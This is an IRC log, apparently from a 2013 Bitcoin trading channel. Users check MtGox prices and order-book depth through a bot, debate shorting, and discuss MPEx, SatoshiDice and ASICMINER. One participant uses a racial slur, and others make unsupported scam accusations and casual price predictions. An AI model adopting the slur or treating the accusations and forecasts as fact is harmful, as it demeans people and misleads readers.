0.28999, Last trade: 76.50000, 24 hour volume: 81138.77068508, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 74.80606 Mar 26 10:28:49 windows old client Mar 26 10:29:10 I guess Mar 26 10:29:25 Is the latest pympex ported to windows yet? Mar 26 10:30:05 Does that mean it calculates deposits and transactions appearing on stats now? Mar 26 10:31:22 no it just does some calculation on new orders Mar 26 10:32:22 ah Mar 26 10:35:30 dunno why it's such a problem with win... anyone tried the dotnet one? Mar 26 10:35:40 ironpython or however they call it Mar 26 10:36:25 ;;bids 0 Mar 26 10:36:27 There are currently 36702157 bitcoins demanded at or over 0.0 USD, worth 8834463.93001 USD in total. | Data vintage: 0.0180 seconds Mar 26 10:36:42 We're getting closer to 9 million USD in bids Mar 26 10:38:33 but it's a bit meaningless. maybe gribble could say "but there are only 11m btc in circulation so if they sold then..." Mar 26 10:38:39 ;;sell 11000000 Mar 26 10:38:40 (sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include expression of (1 more message) Mar 26 10:39:07 ;;market sell 11000000 Mar 26 10:39:11 A market order to sell 11000000 bitcoins right now would net 8836647.0718 USD and would take the last price down to 0.0000 USD, resulting in an average price of 0.8033 USD/BTC. | Data vintage: 0.0160 seconds Mar 26 10:39:40 8834463.93001 vs 8836647.0718 hmm... Mar 26 10:39:44 ic Mar 26 10:39:54 I guess bids increased again... but anyway Mar 26 10:40:39 ;;ticker Mar 26 10:40:40 BTCUSD ticker | Best bid: 76.46001, Best ask: 76.50000, Bid-ask spread: 0.03999, Last trade: 76.50000, 24 hour volume: 81081.40171129, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 74.81300 Mar 26 10:40:40 It's just an very, very general estimation of funds on MtGox. There's still the USD standing idle/not on bids Mar 26 10:40:44 [MPEX] [S.MPOE] 7950 @ 0.00064816 = 5.1529 BTC [+] Mar 26 10:40:55 You know there's at least as much USD as the bids. Mar 26 10:42:34 yes it's impressive anyway Mar 26 10:43:02 Well it's ridiculous as far as I care. Mar 26 10:46:52 Well true enough Mar 26 10:47:45 Well it tend to flow a certain way... Mar 26 10:48:06 Ex: public -> SatoshiDice Mar 26 10:50:29 They took over 65k so far... Mar 26 10:51:27 Well if everyone just keeps their Bitcoins forever... there's going to be some issues Mar 26 10:52:11 Well I'd also get part of that... Mar 26 10:52:23 as long as people spend it... Mar 26 10:53:19 tiber your math is way off Mar 26 10:53:54 go back excuses Mar 26 10:54:12 I don't say they have to spend it... Mar 26 10:55:08 ;;bids 0 Mar 26 10:55:11 There are currently 36703203 bitcoins demanded at or over 0.0 USD, worth 8908860.95577 USD in total. | Data vintage: 0.0174 seconds Mar 26 10:55:24 8.908 million... still increasing Mar 26 10:57:22 Well actually it probably went down because BTC increased in USD. And people want to gamble at max X USD Mar 26 10:57:32 or put x% of their income into gambling Mar 26 10:57:37 and since that's in USD... Mar 26 10:57:45 Of course Mar 26 10:57:55 USD wise however, SD is making gains Mar 26 10:58:24 When I make a BTC investment, I can find out holding BTC might have been better. Mar 26 10:58:39 But as long as in fiat it increases instead, it's not a complete loss. Mar 26 10:58:51 It's just worse than holding BTC Mar 26 10:58:59 yeah, that too Mar 26 10:59:09 [BTCTC] [BASIC-MINING] 2 @ 0.34999 = 0.7 BTC [+] Mar 26 11:01:28 ;;asks 77 Mar 26 11:01:31 There are currently 0 bitcoins offered at or under 77.0 USD, worth 0.0 USD in total. | Data vintage: 0.0017 seconds Mar 26 11:01:38 ;;asks 78 Mar 26 11:01:39 There are currently 2228.4083 bitcoins offered at or under 78.0 USD, worth 173045.230736 USD in total. | Data vintage: 7.1586 seconds Mar 26 11:02:10 ;;ticker Mar 26 11:02:11 BTCUSD ticker | Best bid: 76.77701, Best ask: 77.19000, Bid-ask spread: 0.41299, Last trade: 77.19000, 24 hour volume: 81058.63736284, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 74.89676 Mar 26 11:02:14 mhm Mar 26 11:02:26 large spread Mar 26 11:03:39 yeah Mar 26 11:03:43 But price going up Mar 26 11:03:47 slowly Mar 26 11:04:49 http://bitcoin.clarkmoody.com/ Mar 26 11:04:55 [BTCTC] [ASICMINER-PT] 4 @ 0.75 = 3 BTC [+] Mar 26 11:05:00 The hourly chart says crazy movements Mar 26 11:07:04 i think the claim of 50 million to be a bit high myself Mar 26 11:07:17 but if he can sell it at that good for him Mar 26 11:07:32 he can sell some at the price Mar 26 11:07:34 tiberius: $10k traded on a good day? That's WAY under... Mar 26 11:08:11 better to sell 10% at 10,000 than 100% at 1,000 Mar 26 11:09:53 There's more than $10k traded daily =/ Mar 26 11:10:03 i would agree but there is nothing wrong with mp selling it for that price Mar 26 11:10:08 freemarket Mar 26 11:10:28 ok Mar 26 11:10:48 but the thing is, mp found some people to buy it, 12% Mar 26 11:10:58 its funny until you see he sold 12% Mar 26 11:11:29 yup, i tip my hat to mp for finding so many Mar 26 11:11:48 mp is doing it honestly (i assume) Mar 26 11:12:19 turns out he was not (i assume) Mar 26 11:12:39 but you cant call mp a scammer if you dont know :/ Mar 26 11:12:55 there you go then:) Mar 26 11:13:13 but it is backed up by 12% sales Mar 26 11:13:30 then dont invest, are you trying to convert people? Mar 26 11:14:02 i dont use his exchange or buy his stuff cuz i think it is way overvalued, if you are trying to convert me you are wasting your time Mar 26 11:14:23 well, if he can sell it might as well eh? Mar 26 11:14:45 if i were him id do it too Mar 26 11:14:56 well, im sure he sold some Mar 26 11:15:30 well im off to do some real work, you should really do the same, point out how sucessful mp is is not really a good use of your time. Mar 26 11:16:31 freemarket captalizum, Mar 26 11:16:33 gota love it Mar 26 11:16:40 thank you for imparting this knowledge tiberiusiv Mar 26 11:19:08 So you claim trades on MPEx are fake? Mar 26 11:19:31 well inflated at least Mar 26 11:25:46 i dont have a sweatshop, only because i have more profitable things to do with my limited time Mar 26 11:26:08 oh lol Mar 26 11:26:18 you must be new here Mar 26 11:27:10 i have not "worked" in over a year and even that "work" was "teaching" at a university Mar 26 11:27:59 ;;asks 78 Mar 26 11:28:00 There are currently 2117.1272 bitcoins offered at or under 78.0 USD, worth 164451.6758 USD in total. | Data vintage: 105.3837 seconds Mar 26 11:28:03 ;;asks 80 Mar 26 11:28:04 There are currently 8048.9544 bitcoins offered at or under 80.0 USD, worth 637161.672751 USD in total. | Data vintage: 109.1166 seconds Mar 26 11:29:46 yeah, it is pretty awesome Mar 26 11:29:54 [05:19] namworld: always be weary of someone who has a vested interest in selling you something Mar 26 11:30:08 I don't typically buy S.MPOE but thanks anyway for the advice Mar 26 11:30:25 I get S.DICE mostly. and Options Mar 26 11:35:31 [BTCTC] [PAJKA.BOND] 1 @ 0.10899 BTC [+] Mar 26 11:45:52 hi all Mar 26 11:46:33 hello Mar 26 11:46:39 whats new Mar 26 11:46:45 not much Mar 26 11:46:54 BTC on the up Mar 26 11:46:56 hmmm, i think we may see a dip Mar 26 11:47:03 why? Mar 26 11:47:15 just the depth of the book Mar 26 11:47:19 the buy side looks thin Mar 26 11:47:24 which is pretty rare Mar 26 11:47:40 not at all. Been like taht all day Mar 26 11:47:50 and still moving forward Mar 26 11:48:00 i mean in general it is usually a monster buy side with thing supply Mar 26 11:48:10 1 million sales of btc drops it down to 72 Mar 26 11:48:10 asks are almost just as thin Mar 26 11:48:23 but i think we are going up, new ath soon Mar 26 11:48:25 yeah its pretty thin trading altogether Mar 26 11:48:34 market a little exhausted Mar 26 11:48:36 well, yeah, i mean before 9 Mar 26 11:48:37 excitement doesn't last. Mar 26 11:48:42 i think the market is exhausted Mar 26 11:48:54 and i'm thinking of trying to ride it from 77.50 to 74 Mar 26 11:49:00 when did coinlab come online? Mar 26 11:49:00 this is what naturally wrecks ponzis Mar 26 11:49:14 after sustained rise there's some flagging and that causes a panic Mar 26 11:49:26 yeah Mar 26 11:49:37 http://www.bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 26 11:49:49 i'm thinking that if i can short it here...hopefully there is a sell off and i can buy back in for more Mar 26 11:50:06 after the saturday crash, bids are getting back in the orderbook Mar 26 11:50:21 Bids outweight asks by now Mar 26 11:50:23 yeah... Mar 26 11:50:24 Anyway Mar 26 11:50:37 but 250 coins to move to 77 1250 to move to 78 Mar 26 11:50:59 wall at 77.5 wont hold Mar 26 11:51:01 on such a small scale, that's insignificant Mar 26 11:51:02 5 to 1 pushing down Mar 26 11:51:03 risk shorting btc tho Mar 26 11:51:11 http://bitcoin.clarkmoody.com/ Mar 26 11:51:13 lol, yeah, it is tough Mar 26 11:51:24 Look at hourly Mar 26 11:51:25 and when trading high margin...you want very short scale Mar 26 11:51:36 clark moody always breaks for me Mar 26 11:51:40 using bitcoininty.org Mar 26 11:51:43 ;;asks 77.5 Mar 26 11:51:46 There are currently 194.56549 bitcoins offered at or under 77.5 USD, worth 15078.825151 USD in total. | Data vintage: 0.0017 seconds Mar 26 11:52:00 we're basically raising at about the same speed as before the crash Mar 26 11:52:31 asks are slowly getting eaten too Mar 26 11:52:59 wall gone, now to test the ath Mar 26 11:53:20 ;;asks 78 Mar 26 11:53:20 There are currently 1462.6683 bitcoins offered at or under 78.0 USD, worth 113828.206504 USD in total. | Data vintage: 94.5324 seconds Mar 26 11:53:50 lol at gox fail Mar 26 11:54:10 ;;goxlag Mar 26 11:54:11 0 seconds Mar 26 11:54:33 this is my first bitcoin short Mar 26 11:54:46 hmm Mar 26 11:55:09 and again, i think we may hit an ath today, i just think we will dip a couple of bucks first Mar 26 11:55:13 and then i reverse position Mar 26 11:55:20 ain't sure bout that short Mar 26 11:55:32 but anyway Mar 26 11:55:39 disagreement is the measure of healthy martket. Mar 26 11:55:44 yeah Mar 26 11:55:53 we'll see, i have my finger on the cover button Mar 26 11:55:55 when you all agree i go the other way Mar 26 11:56:00 when you disagree i go play path of exile Mar 26 11:56:10 I'm out for now anyway Mar 26 11:57:14 yall nigras see this Mar 26 11:57:19 www.labsnovo.com? Mar 26 11:58:01 well i got my trailing stop in place Mar 26 11:58:04 we will see Mar 26 12:01:29 there we go] Mar 26 12:03:20 i think it really doesn't take much to burst mt gox to 60 second plus lag Mar 26 12:03:26 wow big sell then big buy Mar 26 12:03:32 i know Mar 26 12:04:06 unfortunately this software is just now realizing the sell, there is lag from gox, then lag to the charts, then lag to bitfinex Mar 26 12:04:37 and for the pleasure of seeing things happening minutes after they actually happen i pay ridiculous fees... :( Mar 26 12:04:48 all the asks and bids were taken out so we should see some crazy movements Mar 26 12:05:08 yes Mar 26 12:05:18 90 coins puts under 77 Mar 26 12:05:41 310 for 76 Mar 26 12:06:38 there it goes again Mar 26 12:10:13 ;;asks 78 Mar 26 12:14:58 ffs big spread Mar 26 12:15:12 yeah Mar 26 12:15:23 i wanted to see a new ath :/ Mar 26 12:17:01 you probably will today Mar 26 12:17:08 but hopefully not before we hit 76 Mar 26 12:17:32 what is with this mini wall at 76.68 Mar 26 12:17:59 ;;ticker Mar 26 12:18:09 BTCUSD ticker | Best bid: 76.68630, Best ask: 77.58899, Bid-ask spread: 0.90269, Last trade: 76.68630, 24 hour volume: 82045.91053246, 24 hour low: 71.52122, 24 hour high: 78.00000, 24 hour vwap: 75.03512 Mar 26 12:18:15 ;;goxlag Mar 26 12:18:25 0.468706 seconds Mar 26 12:19:47 lol they just keep widening this gap Mar 26 12:21:10 ;;later tell toffoo https://bitcointalk.org/index.php?topic=158780.0 Mar 26 12:21:12 The operation succeeded. Mar 26 12:32:12 test Mar 26 12:32:30 hmm Mar 26 12:32:38 dub: copyright 2012-2013? Mar 26 12:32:38 whatcha testing? Mar 26 12:32:49 new laptop Mar 26 12:32:58 registered 10 days ago... Mar 26 12:33:09 yeah its scammy as fuck Mar 26 12:34:14 https://bitcointalk.org/index.php?topic=155896 Mar 26 12:54:19 ;;ticker Mar 26 12:54:19 BTCUSD ticker | Best bid: 77.00003, Best ask: 77.03400, Bid-ask spread: 0.03397, Last trade: 77.00002, 24 hour volume: 81960.22119000, 24 hour low: 71.55001, 24 hour high: 78.00000, 24 hour vwap: 75.09242 Mar 26 13:06:11 [BTCTC] [GSDPT] 14 @ 0.00449 = 0.0629 BTC [+] Mar 26 13:11:28 [MPEX] [S.DICE] 304 @ 0.00449999 = 1.368 BTC [-] Mar 26 13:18:41 78 still holds Mar 26 13:18:42 booo Mar 26 13:23:48 this trading platform is such fucking bullshit Mar 26 13:27:38 the wall doesn't keep price from rising tho Mar 26 13:28:44 yeah Mar 26 13:28:45 true Mar 26 13:29:43 77.77 Mar 26 13:29:51 really 77.777 Mar 26 13:29:59 lucky Mar 26 13:30:08 [HAVELOCK] [VTX] 3 @ 0.7 = 2.1 BTC [-] Mar 26 13:30:10 I'm feeling lucky today Mar 26 13:30:16 More 7s Mar 26 13:30:34 ;;asks 79.99 Mar 26 13:30:37 There are currently 4330.0318 bitcoins offered at or under 79.99 USD, worth 343548.746816 USD in total. | Data vintage: 0.0041 seconds Mar 26 13:30:54 MJR_ you mean all of them? Mar 26 13:31:41 we keepgetting close, but cant reach 78 lol Mar 26 13:31:50 Without that wall to intimidate, there's like nothing until 100... very light slope Mar 26 13:32:08 sells will come in... Mar 26 13:32:12 ;;asks 99.99 Mar 26 13:32:12 There are currently 39920.895 bitcoins offered at or under 99.99 USD, worth 3454701.99447 USD in total. | Data vintage: 96.3542 seconds Mar 26 13:34:07 ;;goxlag Mar 26 13:34:08 90.205895 seconds Mar 26 13:34:24 whut Mar 26 13:34:28 ;;goxlag Mar 26 13:34:28 95.695534 seconds Mar 26 13:34:32 ... Mar 26 13:34:41 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Mar 26 13:34:46 86$ high on stamp Mar 26 13:34:55 just now Mar 26 13:35:59 btc hit 100 https://bitcointalk.org/index.php?topic=85687.msg1678821#msg1678821 Mar 26 13:36:22 on stamp Mar 26 13:36:42 pretty bullish if they will pay 33% more than gox Mar 26 13:37:08 [MPEX] [S.MPOE] 4550 @ 0.00063865 = 2.9059 BTC [-] Mar 26 13:37:09 you mean this Mar 26 13:37:10 ? Mar 26 13:37:10 http://shrani.si/f/3V/sH/2APFuyCb/lol.png Mar 26 13:37:12 was a while ago Mar 26 13:37:17 but its not 100 Mar 26 13:37:22 its just Mar 26 13:37:26 they are plain idiots Mar 26 13:37:37 and they put 100 in the book first, then execute the asks Mar 26 13:38:03 lol Mar 26 13:38:11 still some sold at 100 right? Mar 26 13:38:34 not on stamp Mar 26 13:38:49 Day's range: Mar 26 13:38:49 $74.30 - $86.00 Mar 26 13:39:00 this was yesterday i think Mar 26 13:39:15 day old photo Mar 26 13:39:22 ah Mar 26 13:39:28 anyay someone seems to be messing with the market at 77.777 Mar 26 13:40:23 hmmm Mar 26 13:40:28 seems like a good range Mar 26 13:40:33 wasn't sure if we would break 80 Mar 26 13:40:39 but not that high of a wall really Mar 26 13:42:07 [HAVELOCK] [VTX] 1 @ 0.665 BTC [-] Mar 26 13:42:47 77.95 again Mar 26 13:43:08 [HAVELOCK] [VTX] 3 @ 0.58 = 1.74 BTC [-] Mar 26 13:44:07 [HAVELOCK] [KCIM] 2 @ 1.016 = 2.032 BTC [-] Mar 26 13:44:46 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Mar 26 13:45:08 [HAVELOCK] [KCIM] 1 @ 1.015 BTC [-] Mar 26 13:45:19 ;;goxlag Mar 26 13:45:19 0 seconds Mar 26 13:50:24 78 almost breached... Mar 26 13:50:29 go BTC Mar 26 13:59:07 [HAVELOCK] [KCIM] 1 @ 1.01 BTC [-] Mar 26 14:00:08 [HAVELOCK] [KCIM] 2 @ 1.001 = 2.002 BTC [-] Mar 26 14:04:13 ;;goxlag Mar 26 14:04:13 0.101416 seconds Mar 26 14:04:16 ;;ticker Mar 26 14:04:16 BTCUSD ticker | Best bid: 77.50101, Best ask: 77.77699, Bid-ask spread: 0.27598, Last trade: 77.77699, 24 hour volume: 81032.30957756, 24 hour low: 71.89779, 24 hour high: 78.00000, 24 hour vwap: 75.25893 Mar 26 14:06:48 [MPEX] [O.BTCUSD.C690T] 5 @ 0.12930638 = 0.6465 BTC [+] Mar 26 14:09:30 here we go Mar 26 14:09:42 NATH by 9:30 Mar 26 14:11:36 78 Mar 26 14:11:58 yeehaa Mar 26 14:14:36 127 sold at 78 Mar 26 14:14:45 ;;asks 78 Mar 26 14:14:45 [BTCTC] [S.DICE-PT] 1 @ 0.00499 BTC [+] Mar 26 14:14:46 There are currently 520.72291 bitcoins offered at or under 78.0 USD, worth 40616.3866223 USD in total. | Data vintage: 0.0013 seconds Mar 26 14:14:54 a bit of a wall then Mar 26 14:18:45 and its gone Mar 26 14:18:48 ;;asks 78.01 Mar 26 14:18:48 There are currently 146.47185 bitcoins offered at or under 78.01 USD, worth 11424.8039147 USD in total. | Data vintage: 103.6015 seconds Mar 26 14:18:49 new ath Mar 26 14:19:06 ;;asks 78.01 Mar 26 14:19:09 There are currently 0 bitcoins offered at or under 78.01 USD, worth 0.0 USD in total. | Data vintage: 0.0015 seconds Mar 26 14:19:18 here comes 80 Mar 26 14:19:34 guy is going to get his wall eaten... Mar 26 14:20:16 ;;calc 18000*80 Mar 26 14:20:16 1440000 Mar 26 14:20:34 yeah, why not Mar 26 14:20:58 maybe he'll drop the wall and buy in at market. Mar 26 14:22:11 lol Mar 26 14:23:18 79 Mar 26 14:23:35 ;;goxlag Mar 26 14:23:35 0 seconds Mar 26 14:23:39 ;;ticker Mar 26 14:23:39 BTCUSD ticker | Best bid: 78.40001, Best ask: 79.00000, Bid-ask spread: 0.59999, Last trade: 79.00000, 24 hour volume: 82470.81706976, 24 hour low: 71.89779, 24 hour high: 79.00000, 24 hour vwap: 75.34531 Mar 26 14:23:53 large wall removeds Mar 26 14:23:57 removed* Mar 26 14:24:16 back... Mar 26 14:24:23 lol, now he's getting market bids in. Mar 26 14:24:26 here we goooooo Mar 26 14:24:36 79.70 Mar 26 14:24:40 HOLY SHIT Mar 26 14:24:50 Stop it people >.> Mar 26 14:24:51 !ticker Mar 26 14:24:51 I haven't understood a single word you've said since I met you, not one single word. Mar 26 14:24:53 watch gox freeze now Mar 26 14:24:57 ;;ticker Mar 26 14:24:57 BTCUSD ticker | Best bid: 78.38000, Best ask: 79.58766, Bid-ask spread: 1.20766, Last trade: 79.50000, 24 hour volume: 82500.26463872, 24 hour low: 71.89779, 24 hour high: 79.04992, 24 hour vwap: 75.35045 Mar 26 14:24:59 THE FUCK Mar 26 14:25:27 just some lil walls Mar 26 14:25:35 its a big ass wall Mar 26 14:25:41 thatll drop Mar 26 14:25:42 but... lets see if it stands Mar 26 14:25:59 he's got a buffer wall Mar 26 14:26:34 wall dropped Mar 26 14:27:10 it did, still there but much less Mar 26 14:27:21 ;;asks 80 Mar 26 14:27:22 There are currently 3554.2802 bitcoins offered at or under 80.0 USD, worth 284165.021183 USD in total. | Data vintage: 55.1147 seconds Mar 26 14:27:29 in fucking sane Mar 26 14:28:06 [BTCTC] [BASIC-MINING] 2 @ 0.34999 = 0.7 BTC [+] Mar 26 14:29:55 ;;asks 80 Mar 26 14:29:55 There are currently 3808.2111 bitcoins offered at or under 80.0 USD, worth 304401.035789 USD in total. | Data vintage: 26.4863 seconds Mar 26 14:30:15 that wont hold, usa is starting to wake up and buy... Mar 26 14:31:36 Good, good. Mar 26 14:32:44 ;;estimate Mar 26 14:32:45 Next difficulty estimate | 6881519.95343 based on data since last change | 7299527.825 based on data for last three days Mar 26 14:33:49 urgh Mar 26 14:34:09 There's no options available on MPEx Mar 26 14:36:01 :) Mar 26 14:37:32 [BTCTC] [PAJKA.BOND] 1 @ 0.09 BTC [-] Mar 26 14:39:23 whats up with that Mar 26 14:40:23 No idea Mar 26 14:40:41 Anyone with his options already purchased must be quite happy Mar 26 14:41:11 They're back at last Mar 26 14:41:47 At a premium on the call side... average increased Mar 26 14:43:59 [MPEX] [S.MPOE] 9900 @ 0.00064816 = 6.4168 BTC [+] Mar 26 14:43:59 $depth o.btcusd.c750t Mar 26 14:44:02 mircea_popescu: O.BTCUSD.C750T Bids: ['1000 @ 0.06090229'] Mar 26 14:44:02 mircea_popescu: Asks: ['1000 @ 0.09287598', '1000 @ 0.25'] Mar 26 14:44:08 [HAVELOCK] [SDICE] 2 @ 0.454 = 0.908 BTC [+] Mar 26 14:44:10 [HAVELOCK] [SDICE] 6 @ 0.453 = 2.718 BTC [-] Mar 26 14:44:15 about there neh ? Mar 26 14:44:23 too spensive! Mar 26 14:44:26 yeah Mar 26 14:44:36 !last m o.btcusd.c750t Mar 26 14:44:37 Last trade for O.BTCUSD.C750T on MPEX was at 0.0689697 BTC [-] Mar 26 14:44:58 I think that was me buying Mar 26 14:45:08 [HAVELOCK] [HIM] 2 @ 1.501 = 3.002 BTC [+] Mar 26 14:45:10 [HAVELOCK] [HIM] 2 @ 1.5 = 3 BTC [-] Mar 26 14:45:11 [HAVELOCK] [HIM] 1 @ 1.5 BTC [-] Mar 26 14:45:32 Yup, was me buying Mar 26 14:45:38 A little 1000 options Mar 26 14:46:08 [HAVELOCK] [HIM] 2 @ 1.4925 = 2.985 BTC [-] Mar 26 14:46:45 i thought mpex trades are all fake and shit. Mar 26 14:47:09 why was the most recent ASICMINER dividend so low? Mar 26 14:47:21 Thinker_: ? Mar 26 14:47:23 it was a bonus Mar 26 14:47:35 meanwhile on twitter "UK's online gambling sector worth £2bn in 2012" Mar 26 14:47:37 ThickAsThieves: ok good Mar 26 14:47:37 but the next WILL be low Mar 26 14:47:45 ThickAsThieves: why? Mar 26 14:47:55 read about what you bought Mar 26 14:48:08 [HAVELOCK] [HIM] 2 @ 1.49 = 2.98 BTC [-] Mar 26 14:48:15 til now the company has not been paying themselves Mar 26 14:48:20 this week they start Mar 26 14:48:49 ASICMINER is for 50% of the company. But they pay back IPO price to shares sold. Mar 26 14:48:56 ThickAsThieves: interesting. Where are you getting this news? I am not getting any announcements like this from BitFunder.com Mar 26 14:48:58 So for the first weeks it was 100% Mar 26 14:49:08 [HAVELOCK] [HIM] 1 @ 1.45 BTC [-] Mar 26 14:49:10 bitfunder is a passthru for AM Mar 26 14:49:14 not a source Mar 26 14:49:22 AM? Mar 26 14:49:28 nm Mar 26 14:49:31 ATH Mar 26 14:49:32 here you go Mar 26 14:49:33 https://bitcointalk.org/index.php?topic=99497.0 Mar 26 14:49:41 thank you :) Mar 26 14:49:47 no probmemo! Mar 26 14:49:52 problemo Mar 26 14:49:53 lol Mar 26 14:50:09 [HAVELOCK] [SDICE] 2 @ 0.453 = 0.906 BTC [-] Mar 26 14:51:56 ;;goxlag Mar 26 14:51:58 1.215531 seconds Mar 26 14:52:07 its quiet...too quiet Mar 26 14:53:01 we are waiting for btc to break 1k :) Mar 26 14:55:15 think we are going through 80 today? Mar 26 14:55:22 yes Mar 26 14:55:45 quite likely Mar 26 14:55:50 yes Mar 26 14:56:14 me too Mar 26 14:56:26 once we get to 79.85 or so, those walls will probably fall Mar 26 14:57:04 yeah 300k is not really a big wall nowadays Mar 26 14:57:17 was more interested in psychological barrier of big round number Mar 26 14:57:19 ;;asks 79.84 Mar 26 14:57:19 There are currently 330.97408 bitcoins offered at or under 79.84 USD, worth 26409.0538315 USD in total. | Data vintage: 5.6651 seconds Mar 26 14:57:26 ;;asks 80 Mar 26 14:57:26 There are currently 3807.7847 bitcoins offered at or under 80.0 USD, worth 304429.083077 USD in total. | Data vintage: 12.9988 seconds Mar 26 14:57:29 hehe Mar 26 15:00:29 24 hours left to bid on a pre order for Avalon ASIC Batch 2! https://bitcointalk.org/index.php?topic=158227.msg1679211#msg1679211 Mar 26 15:00:39 hey DT Mar 26 15:00:55 can you put a link to https://bitcointalk.org/index.php?topic=99497.0 in your asicminer PT descriptions? Mar 26 15:02:54 done Mar 26 15:03:00 cool cool Mar 26 15:05:28 hmmm... did MPOE bots pricing model get tweaked? Mar 26 15:06:33 seems notably higher Mar 26 15:07:24 I wonder if mircea_popescu changed the pricing from 24vwap based to a blend of 24hr and spot Mar 26 15:07:26 what, srsly ? Mar 26 15:07:34 i didn't change anything Mar 26 15:07:39 ok Mar 26 15:07:40 hmmm Mar 26 15:08:00 maybe I was just underestimating the amount of time premium Mar 26 15:09:38 i think it's probably just seeing more volatility Mar 26 15:09:46 as there's been a lot lately Mar 26 15:10:03 ah... volatility is explicitly programmed in Mar 26 15:10:08 http://www.businessweek.com/news/2013-03-25/slovenia-s-nascent-cabinet-under-pressure-to-avoid-cyprus-fate Mar 26 15:10:09 [HAVELOCK] [VTX] 5 @ 0.7444 = 3.722 BTC [+] Mar 26 15:10:12 is slovenia fucked ? Mar 26 15:10:23 Bugpowder what do you mean ? Mar 26 15:12:19 I mean, volatility is in the model, and is a reflection of some relatively short term variance, rather than a long term (1yr) variance or a magic number. Mar 26 15:12:26 stated more clearly. Mar 26 15:13:09 [HAVELOCK] [VTX] 8 @ 0.7445 = 5.956 BTC [+] Mar 26 15:13:37 it looks at a lot of data. long term, mid term, short term Mar 26 15:13:46 thing is, as high volatility days turn into weeks Mar 26 15:13:52 yeah Mar 26 15:13:54 of course it'd change its estimation of the volatility Mar 26 15:14:05 i figured it would be multi scale Mar 26 15:14:20 yeah Mar 26 15:14:26 looks like we may break thru 80 before 15:00. Mar 26 15:14:32 quite possible Mar 26 15:14:43 and if 80 goes i would guess 100 may happen Mar 26 15:15:34 mircea_popescu Jansa is butthurt and posting shit around - we are way better than Italy if that is any consolation Mar 26 15:15:41 :p Mar 26 15:15:50 we aren't gonna touch 100 this week Mar 26 15:15:57 but we might get close Mar 26 15:16:07 next week, maybe... Mar 26 15:16:23 later dudes. Mar 26 15:20:24 kakobrekla :p Mar 26 15:28:57 ;;hashrate Mar 26 15:28:57 Error: "hashrate" is not a valid command. Mar 26 15:29:13 ;;nethash Mar 26 15:29:13 52161.604881 Mar 26 15:30:18 lucif tends to think we will hit $100 this week https://bitcointalk.org/index.php?topic=131065.1000;topicseen Mar 26 15:31:34 i think we might Mar 26 15:31:38 ;;asks 100 Mar 26 15:31:41 There are currently 28670.471 bitcoins offered at or under 100.0 USD, worth 2585939.459 USD in total. | Data vintage: 0.0028 seconds Mar 26 15:32:08 we have seen market orders of over 1 million recently Mar 26 15:33:06 lucif however has been wrong way more than right Mar 26 15:33:06 incredible. Mar 26 15:33:35 yeah definitely not saying we will... just... i think the sentiment is that we will very soon Mar 26 15:33:46 certainly within april Mar 26 15:36:52 does anyone have any info on the coinlab mtgox merger? any wealth flowing through it yet? Mar 26 15:39:12 interesting actually... they blew their date, failed to release alpha and no further news Mar 26 15:39:17 as far as we know it's dead. Mar 26 15:39:55 [MPEX] [S.MPOE] 6450 @ 0.00063865 = 4.1193 BTC [-] Mar 26 15:40:15 okay so nothing new then... lol Mar 26 15:40:39 [BTCTC] [PAJKA.BOND] 1 @ 0.108897 BTC [+] Mar 26 15:40:42 [BTCTC] [PAJKA.BOND] 3 @ 0.108898 = 0.3267 BTC [+] Mar 26 15:40:44 [BTCTC] [PAJKA.BOND] 21 @ 0.10899 = 2.2888 BTC [+] Mar 26 15:41:04 myea Mar 26 15:41:08 [BTCTC] [PAJKA.BOND] 4 @ 0.10899 = 0.436 BTC [+] Mar 26 15:48:20 ;;goxlag Mar 26 15:48:21 2.112843 seconds Mar 26 15:56:05 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Mar 26 15:56:18 ;;bids 0 Mar 26 15:56:18 There are currently 36681645 bitcoins demanded at or over 0.0 USD, worth 9119639.08052 USD in total. | Data vintage: 6.2884 seconds Mar 26 15:56:22 9.1M Mar 26 15:56:23 noice Mar 26 15:56:33 all time high Mar 26 15:58:04 there was talk of a crash a while back but that topic seemed to have fizzled Mar 26 15:58:21 crash but rebound of course, cyclic as markets are Mar 26 15:58:36 maybe crash is a strong word...dip? Mar 26 15:58:51 don't fight the tape Mar 26 15:59:00 5000 accounts waiting for verification. Mar 26 15:59:12 assume conservatively a mean investment of $2000 per account Mar 26 15:59:18 probably way low Mar 26 15:59:30 = $10,000,000 of new funds flowing into gox soon. Mar 26 15:59:55 Dips will get strongly bought Mar 26 16:00:00 until one day they don't Mar 26 16:00:29 it will probably take a negative news event to trigger a real crash. Mar 26 16:03:06 figured..as i've noticed you seem to give pretty reasonable information Mar 26 16:05:49 dip yea Mar 26 16:06:04 i don't think 2k is way low tbh Mar 26 16:06:08 i think 100 bux is a saner avg Mar 26 16:06:54 i would say $500 is reasonable for motivated newbs. but it would be a bell curve of deposits Mar 26 16:06:55 mircea_popescu: I'm guessing median is $1000 for joe reddit, but mean could skew significantly higher Mar 26 16:07:11 how does joe reddit have 1k disposable ?! Mar 26 16:07:17 good question Mar 26 16:07:18 life savings! Mar 26 16:07:20 dude srlsy, ask people. Mar 26 16:07:29 mom is still paying their insurance... Mar 26 16:07:44 if joe reddit meets drop dead gorgeous sexbomb he doesn't move Mar 26 16:07:45 because Mar 26 16:07:50 he doesn't have fiddy bux to dine her. Mar 26 16:07:53 Some 17 year old kid keeps buying $1000 in coins off me with cash every week Mar 26 16:08:04 I don't know if he is dealing the coins at school or what Mar 26 16:08:12 Bugpowder he's prolly dealing dope. Mar 26 16:08:26 I think he is investing too Mar 26 16:08:35 or else he has a wicked shot Mar 26 16:08:35 seems to be very excited about the rise in price. Mar 26 16:10:04 Bugpowder: what country are you in? Mar 26 16:10:23 USA Mar 26 16:11:02 where does a 17 yr old get $1k a week? Mar 26 16:11:19 for real Mar 26 16:12:58 Probably reselling coins Mar 26 16:13:00 or SR Mar 26 16:13:05 or both Mar 26 16:13:25 reselling coins is probably more profitable and much less risk Mar 26 16:13:38 25% markup... $250 / wk Mar 26 16:13:57 plus the coins appreciate between the time I 